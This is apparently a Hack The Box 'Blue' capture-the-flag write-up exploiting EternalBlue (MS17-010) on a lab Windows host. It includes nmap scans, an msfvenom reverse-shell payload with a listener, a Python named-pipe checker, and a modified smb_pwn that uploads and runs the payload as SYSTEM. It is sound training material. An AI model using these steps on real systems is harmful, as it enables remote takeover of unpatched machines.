Hack The Box Blue Write-Up (Using msfvenom)
1. Executive Summary
The target is a Windows machine vulnerable to the infamous EternalBlue. EternalBlue is the name of an exploit developed by the National Security Agency (NSA) and leaked publicly in 2017; it abuses a flaw in Microsoft's implementation of the SMBv1 (Server Message Block version 1) file-sharing protocol, which Microsoft fixed in security bulletin MS17-010. Only Windows systems are affected, but any unpatched Windows host that still exposes SMBv1 on the network can be compromised with it, which is what made it such an effective vector for ransomware such as WannaCry.
Nmap is the tool we use to scan the target, so it is a must in the enumeration phase. Below is my usual nmap command (note that -A already implies -sV and -sC, and -p- with -A takes a while).
nmap -sV -sC -A -p- -v -oA blue 10.10.10.40
According to the nmap results there are nine open ports. Ports 139 and 445 being open told me that SMB is exposed, so I ran nmap again with its vulnerability scripts to check the service against known vulnerabilities using the command below.
nmap -p445 --script vuln 10.10.10.40
It reported that the system is vulnerable to MS17-010. MS17-010, better known as EternalBlue, is a vulnerability that allows an attacker to achieve remote code execution by sending specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.
I used searchsploit to find a working exploit for MS17-010 and decided on this one, the impacket-based Python script from Exploit-DB (linked at the end of the post).
To run the exploit you need impacket installed for the Python interpreter you run it with. I ran into problems with this particular library: my default Python is 2.7, while impacket had been installed for Python 3. Running the exploit under Python 3 produced a wall of errors, so after some reading I installed impacket under Python 2.7, which first meant installing pip for Python 2, since my default pip was the Python 3 one.
Long story short, I solved it thanks to this excellent discussion forum. After all the struggle with impacket, all I actually had to do was upgrade setuptools with the command below (run it with the pip that belongs to the same interpreter the exploit uses).
pip install --upgrade setuptools
While troubleshooting impacket I read through the script we downloaded earlier and discovered that it needs a named pipe name as an argument in order to run.
While searching for a way to find a valid pipe name I discovered checker.py from https://raw.githubusercontent.com/worawit/MS17-010/master/checker.py, which enumerates the named pipes the target lets us open.
On the first try it failed. Re-reading the script, I found that its username and password fields were still empty, so I changed them to 'vagrant' and 'vagrant', the same defaults the exploit script uses.
Running checker.py again revealed several valid pipe names.
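For readers who want the same check without checker.py and its bundled mysmb module, here is an added example (my code, not the page's and not checker.py itself) that ports the idea to impacket's high-level SMBConnection API under Python 3: log in, connect to IPC$, try to open each candidate pipe and report the NTSTATUS it comes back with. The host, the credentials, the candidate list (a subset of checker.py's) and the status-to-label mapping are assumptions; the probing loop is separated from the network code so it can be exercised without a target.

```python
"""Named-pipe checker for the MS17-010 exploit (added example, not the
page's code).  A pipe that opens cleanly over an SMBv1 session is what
the exploit script expects as its pipe-name argument."""

# Subset of the candidates checker.py tries (assumption: these are the
# ones most often open on Windows 7 / 2008-era hosts).
PIPE_CANDIDATES = [
    "netlogon", "lsarpc", "samr", "browser", "atsvc", "epmapper",
    "eventlog", "ntsvcs", "spoolss", "srvsvc", "wkssvc",
]

# NTSTATUS values the open attempt typically returns.
STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034  # pipe does not exist on this host
STATUS_ACCESS_DENIED = 0xC0000022          # pipe exists, these credentials may not open it
STATUS_PIPE_NOT_AVAILABLE = 0xC00000AC     # pipe exists, no server instance is listening


def classify(status):
    """Human-readable label for a non-zero NTSTATUS."""
    return {
        STATUS_OBJECT_NAME_NOT_FOUND: "not found",
        STATUS_ACCESS_DENIED: "access denied",
        STATUS_PIPE_NOT_AVAILABLE: "not available",
    }.get(status, "error 0x%08X" % status)


def find_usable_pipes(open_pipe, candidates=PIPE_CANDIDATES):
    """Try every candidate; open_pipe(name) must return an NTSTATUS code
    (0 when the pipe opened).  Returns (usable_names, {name: label})."""
    usable, details = [], {}
    for name in candidates:
        status = open_pipe(name)
        if status == 0:
            details[name] = "Ok"
            usable.append(name)
        else:
            details[name] = classify(status)
    return usable, details


def probe_target(host, username="", password="", port=445):
    """Real probe: needs impacket and a reachable target.  Empty
    credentials mean an anonymous/guest session (assumption: the target
    allows one, as Blue does)."""
    from impacket.smbconnection import SMBConnection, SessionError
    from impacket.smb import SMB_DIALECT  # force SMBv1, the dialect the exploit needs

    conn = SMBConnection(host, host, sess_port=port, preferredDialect=SMB_DIALECT)
    conn.login(username, password)
    tid = conn.connectTree("IPC$")  # named pipes live under the IPC$ share

    def open_pipe(name):
        try:
            fid = conn.openFile(tid, "\\" + name)
        except SessionError as e:
            return e.getErrorCode()
        conn.closeFile(tid, fid)
        return 0

    try:
        return find_usable_pipes(open_pipe)
    finally:
        conn.disconnectTree(tid)
        conn.logoff()


if __name__ == "__main__":
    import sys
    # usage: python pipecheck.py <host> [username] [password]
    usable, details = probe_target(sys.argv[1], *sys.argv[2:4])
    for name, state in details.items():
        print("%-10s %s" % (name, state))
    print("usable pipes:", ", ".join(usable) or "none")
```

A pipe reported as "Ok" is one the exploit script can use; "access denied" means the pipe exists but the supplied credentials cannot open it, which is one reason a first run can come back with nothing usable.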
Now that we have a list of valid pipe names we need to re-run the exploit script. According to this website, the script has to be modified before it is run.
We need to modify the smb_pwn function so that it uploads and executes our payload, which we create with msfvenom using the command below (LHOST is our own VPN address, LPORT the port our listener will wait on).
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.8 LPORT=2222 -f exe > exploit.exe
Now that the payload is ready, we modify the script accordingly.
Before re-running the exploit script we need to set up a listener on the port we defined in the payload.
nc -lnvp 2222
Then run the exploit with one of the pipe names we found earlier.
We get a shell as NT AUTHORITY\SYSTEM!
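Because the post does not show the edit to the script itself, here is an added example of what the modified smb_pwn looks like. It is my code, not the page's and not the exploit author's, and it assumes the Exploit-DB script is worawit's zzz_exploit.py, whose helpers smb_send_file() (upload through the C$ admin share) and service_exec() (run a command through the Service Control Manager as SYSTEM) it calls. The local file name and the name the binary is dropped under are assumptions, and the two keyword arguments exist only so the function can be exercised without a target.

```python
# Added example: drop-in replacement for smb_pwn() in zzz_exploit.py
# (assumption: that is the Exploit-DB script the post uses).  Not the
# page's or the script author's code.

LOCAL_EXE = "exploit.exe"    # assumption: the msfvenom output from the command above
REMOTE_NAME = "exploit.exe"  # assumption: file name to drop under C:\ on the target


def build_exec_command(remote_name):
    """Command string handed to service_exec(); cmd /c wraps the binary
    so it runs like a normal program rather than as a service image."""
    return "cmd /c c:\\" + remote_name


def smb_pwn(conn, arch, local_exe=LOCAL_EXE, remote_name=REMOTE_NAME,
            send_file=None, run_cmd=None):
    """Called by the exploit once it holds an SMB session running as SYSTEM.
    'arch' is the target architecture the exploit detected; a cmd-wrapped
    payload works for either, so it is not used here."""
    # Default to the helpers the exploit script defines at module level
    # (smb_send_file / service_exec); tests inject fakes instead.
    send_file = send_file or smb_send_file
    run_cmd = run_cmd or service_exec
    smbConn = conn.get_smbconnection()

    print("uploading %s to C:\\%s" % (local_exe, remote_name))
    send_file(smbConn, local_exe, "C", "/" + remote_name)  # C$ share, path under the drive root

    cmd = build_exec_command(remote_name)
    print("executing: " + cmd)
    run_cmd(conn, cmd)  # creates and starts a service that runs cmd as SYSTEM
    return cmd
```

Paste this over the existing smb_pwn in the script, start the nc listener, then run the script with the target address and one of the pipe names from checker.py. service_exec starts the command as a Windows service, which is why the script's own comment suggests an msfvenom exe-service payload; wrapping a plain exe in cmd /c, as above, is the approach the post follows.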
After landing as SYSTEM, I tried to look for the user and root flags with the command below.
Sadly, the find command did not get me anywhere (on Windows, find filters text in its input rather than searching the file system), so I had no choice but to look for the flags manually.
Thankfully this machine keeps its flags in the usual places: the user flag is in C:\Users\haris\Desktop and the root flag in C:\Users\Administrator\Desktop.
Links referenced in this write-up:
What Is EternalBlue and Why Is the MS17-010 Exploit Still Relevant? (article on who created EternalBlue and the origins of the SMB flaw)
Offensive Security's Exploit Database Archive (the impacket/mysmb Python exploit for MS17-010 used above)
EternalBlue without Metasploit (blog post on running the exploit without Metasploit at all)